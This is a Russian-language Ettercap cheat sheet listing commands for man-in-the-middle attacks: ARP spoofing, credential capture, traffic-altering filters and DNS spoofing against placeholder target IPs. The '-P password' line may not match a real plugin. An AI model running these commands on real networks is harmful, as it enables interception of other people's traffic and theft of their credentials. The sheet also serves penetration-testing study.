Перейти к содержанию

ettercap

ettercap

Присоединяйтесь к нашему Telegram-каналу, чтобы первыми узнавать о новостях, трендах и уникальных материалах по кибербезопасности!

Запуск Ettercap в графическом режиме:

ettercap -G

Запуск Ettercap в текстовом режиме:

ettercap -T -i <интерфейс>

Сканирование сети и выбор цели:

  • Открыть Ettercap в графическом режиме: ettercap -G
  • Перейти в меню Hosts > Scan for hosts.
  • Открыть список узлов: Hosts > Host list.

Установка двух целей (используется для атаки "человек посередине" - Man-in-the-Middle):

  • После сканирования, откройте список узлов.
  • Выберите первую цель и назначьте её как Target 1.
  • Выберите вторую цель и назначьте её как Target 2.

ARP Spoofing для перехвата трафика:

ettercap -T -M arp:remote /<цель 1 IP>/ /<цель 2 IP>/

Фильтрация паролей и учетных данных:

ettercap -T -M arp /<цель 1 IP>/ /<цель 2 IP>/ -P password

Запись захваченного трафика в файл:

ettercap -T -w <путь_к_файлу>

Загрузка и использование фильтра для подмены данных:

  1. Создайте фильтр в файле и откомпилируйте его:
etterfilter <файл_фильтра> -o <скомпилированный_файл>
  1. Запустите Ettercap с фильтром:
ettercap -T -M arp:remote /<цель 1 IP>/ /<цель 2 IP>/ -F <скомпилированный_файл>

Атака DNS Spoofing:

  • Настройте файл etter.dns с нужными правилами подмены.
  • Запустите Ettercap с использованием DNS подмены:
ettercap -T -M arp:remote /<цель 1 IP>/ /<цель 2 IP>/ -P dns_spoof

Список доступных плагинов:

ettercap -T -P list